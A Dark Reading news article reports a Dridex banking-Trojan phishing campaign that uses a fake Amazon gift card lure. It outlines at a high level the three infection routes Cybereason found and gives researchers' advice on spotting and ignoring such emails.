Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

Threat Intelligence

12:40 PM
Connect Directly

Amazon Gift Card Scam Delivers Dridex This Holiday Season

Dridex operators launch a social engineering scam that promises victims a $100 gift card but delivers a banking Trojan.

The operators behind Dridex have a nefarious trick up their sleeves this holiday season: A widespread phishing scam promises victims a $100 Amazon gift card but instead delivers the prolific banking Trojan to target machines.

Related Content:

2020 Cybersecurity Holiday Gift Guide for Kids

How Data Breaches Affect the Enterprise

New From The Edge: Delivering Santa from Third-Party Risk

This campaign first appeared around Halloween and picked up in the beginning of November, the Cybereason Nocturnus team reports. Most targets are from the United States and Western Europe, where Amazon is very popular and people may be more likely to fall for a scam like this – especially at a time when online shopping and gift-giving is more prevalent due to COVID-19. 

Victims receive an email that claims to be delivering a gift from Amazon: "We are delighted to enclose a $100 Amazon gift card as our way of saying Thank You," a sample message says. The researchers found most emails pretend to come from Amazon, though exact wording may vary.

This email prompts its recipient to download a gift card, which leads to Dridex infection through one of three different methods. 

The first delivery vector is a malicious Word document with a variation of "gift card" in the file name. This file requests the victim click "enable content," which runs the macros. This is a common technique used in phishing attacks; embedded macros are usually disabled by default. 

If a user enables content, an obfuscated VBScript file is executed. The macro itself contains an obfuscated, base64 encoded PowerShell script that opens a pop-up with a fake error message. This tricks the user into thinking there was an error while the macro runs in the background. The PowerShell connects to the command-and-control (C2) server and delivers the Dridex payload.

The second delivery vector involves screensaver (SCR) files, which are also popular among attackers. These enable criminals to bypass email filters solely based on file extension, as well as to bundle multiple components together, as SCR files are eventually self-executing archives. 

"They can run and execute any type of code aside from the screensaver itself," explains Assaf Dahan, threat research lead at Cybereason. "So they have the potential of being malicious and they exploit this as well … to evade certain security products or email screening software."

In this campaign, the SCR files have convincing Amazon-themed icons and naming conventions, researchers point out in a writeup of their findings. One of the files contains a VBScript, an archive, a utility to extract it, and a batch file. 

The third delivery method is a straightforward VBScript file that is downloaded via a malicious link in the email body. It's about 2MB in size due to an archive bundled with it, researchers say.

Dridex's use of these techniques isn't unusual, Dahan says. The tactics themselves have proved effective for years, and a variety of infections increases the likelihood of successful attacks.

"It's mainly the idea of not putting all your eggs in one basket," he explains. "If one technique gets picked up by a certain security product or email filter, they'll still have other options, so it doesn't burn out their entire operation."

Some corporate devices have security policies to block macros from being enabled, for example, and this would disrupt the first attack method.

An Unwelcome Holiday Surprise
Dridex is a notorious banking Trojan that has been active in different variants since 2012, the Cybereason team reports. It's an evasive malware that steals banking credentials and other sensitive data, with a resilient C2 infrastructure in which servers act as backups for one another.

Evil Corp, the attack group behind Dridex, makes a lot of money in attacks like these. While it's not directly stealing funds, it's obtaining access, credentials, and other valuable information it can sell on the Dark Web. Its scams cause great disruption for both people and businesses. 

"When you have fraud there's a lot of collateral damage," Dahan notes. "It costs not only the victims, who may lose money or may lose sensitive information, but there's also the cost to companies that need to reimburse their customers or invest time and money and effort in investigations and mitigations."

The threat to corporate machines is high, he points out. Once Dridex lands on a device, it could steal intellectual property, administrator credentials, and other data that could escalate the attack from a commodity malware incident to a full-fledged hacking operation, Dahan says.

When asked how employees can protect themselves from the threat, his first advice is simple: "Just use common sense," he says. "There are no free gifts. If someone offers you a free gift, it's probably that they're up to no good." Victims should simply ignore or delete the email.

Skeptical recipients should check the sender's email; oftentimes in these attacks, the address will try to resemble the spoofed company's name but may contain typos or unnecessary characters. Look for grammatical errors or language that seems strange coming from Amazon or any major service provider, Dahan adds. If you do click a link and are prompted to enter credentials, close the page. Same advice applies to enabling macros. 

"That's the last thing you should do," Dahan warns. "You should not enable that content because by enabling the content you will allow malicious code to run on your machine." 

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance & Technology, where she covered financial ... View Full Bio

Recommended Reading:

Comment  | 
Print  | 
More Insights
Threaded  |  Newest First  |  Oldest First
How SolarWinds Busted Up Our Assumptions About Code Signing
Dr. Jethro Beekman, Technical Director,  3/3/2021
'ObliqueRAT' Now Hides Behind Images on Compromised Websites
Jai Vijayan, Contributing Writer,  3/2/2021
Attackers Turn Struggling Software Projects Into Trojan Horses
Robert Lemos, Contributing Writer,  2/26/2021
Register for Dark Reading Newsletters
White Papers
Cartoon Contest
Write a Caption, Win an Amazon Gift Card! Click Here
Latest Comment: George has not accepted that the technology age has come to an end.
Current Issue
2021 Top Enterprise IT Trends
We've identified the key trends that are poised to impact the IT landscape in 2021. Find out why they're important and how they will affect you today!
Flash Poll
How Enterprises are Developing Secure Applications
How Enterprises are Developing Secure Applications
Recent breaches of third-party apps are driving many organizations to think harder about the security of their off-the-shelf software as they continue to move left in secure software development practices.
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
PUBLISHED: 2021-03-06
Wazuh API in Wazuh from 4.0.0 to 4.0.3 allows authenticated users to execute arbitrary code with administrative privileges via /manager/files URI. An authenticated user to the service may exploit incomplete input validation on the /manager/files API to inject arbitrary code within the API service sc...
PUBLISHED: 2021-03-05
The Blog module in Kentico CMS 5.5 R2 build 5.5.3996 allows SQL injection via the tagname parameter.
PUBLISHED: 2021-03-05
Deutsche Post Mailoptimizer 4.3 before 2020-11-09 allows Directory Traversal via a crafted ZIP archive to the Upload feature or the MO Connect component. This can lead to remote code execution.
PUBLISHED: 2021-03-05
ssh-agent in OpenSSH before 8.5 has a double free that may be relevant in a few less-common scenarios, such as unconstrained agent-socket access on a legacy operating system, or the forwarding of an agent to an attacker-controlled host.
PUBLISHED: 2021-03-05
The npm package ansi_up converts ANSI escape codes into HTML. In ansi_up v4, ANSI escape codes can be used to create HTML hyperlinks. Due to insufficient URL sanitization, this feature is affected by a cross-site scripting (XSS) vulnerability. This issue is fixed in v5.0.0.